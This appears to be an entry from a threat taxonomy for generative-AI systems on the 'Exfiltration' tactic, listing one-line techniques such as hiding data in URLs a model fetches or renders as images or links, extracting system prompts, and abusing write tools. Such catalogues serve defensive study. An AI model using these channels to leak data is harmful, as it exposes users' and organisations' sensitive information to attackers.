Exfiltration

Type: tactic

Description: The adversary is trying to steal data or other information from your genai system.

Version: 0.1.0

Created At: 2025-07-23 10:23:39 -0400

Last Modified At: 2025-07-23 10:23:39 -0400

Tactic Order: 15


External References

  • <-- Web Request Triggering (technique): An adversary can exfiltrate data by embedding it in a URI and triggering the AI system to query it via its browsing capabilities.
  • <-- Abuse Trusted Sites (technique): An adversary can exfiltrate data by hosting attacker-controlled endpoints on trusted domains.
  • <-- LLM Data Leakage (technique): Exploiting data leakage vulnerabilities in large language models to retrieve sensitive or unintended information.
  • <-- Extract LLM System Prompt (technique): Extracting AI system instructions and exfiltrating them outside of the organization.
  • <-- Exfiltration via ML Inference API (technique): Exfiltrating data by exploiting machine learning inference APIs to extract sensitive information.
  • <-- Clickable Link Rendering (technique): An adversary can exfiltrate data by embedding it in the parameters of a URL, and getting AI to render it as a clickable link to the user, which clicks it.
  • <-- Image Rendering (technique): An adversary can exfiltrate data by embedding it in the query parameters of an image, and getting AI to render it.
  • <-- Exfiltration via Cyber Means (technique): Using cyber means, such as data transfers or network-based methods, to exfiltrate machine learning artifacts or sensitive data.
  • <-- Write Tool Invocation (technique): An adversary can exfiltrate data by encoding it into the input of an invocable tool capable performing a write operation.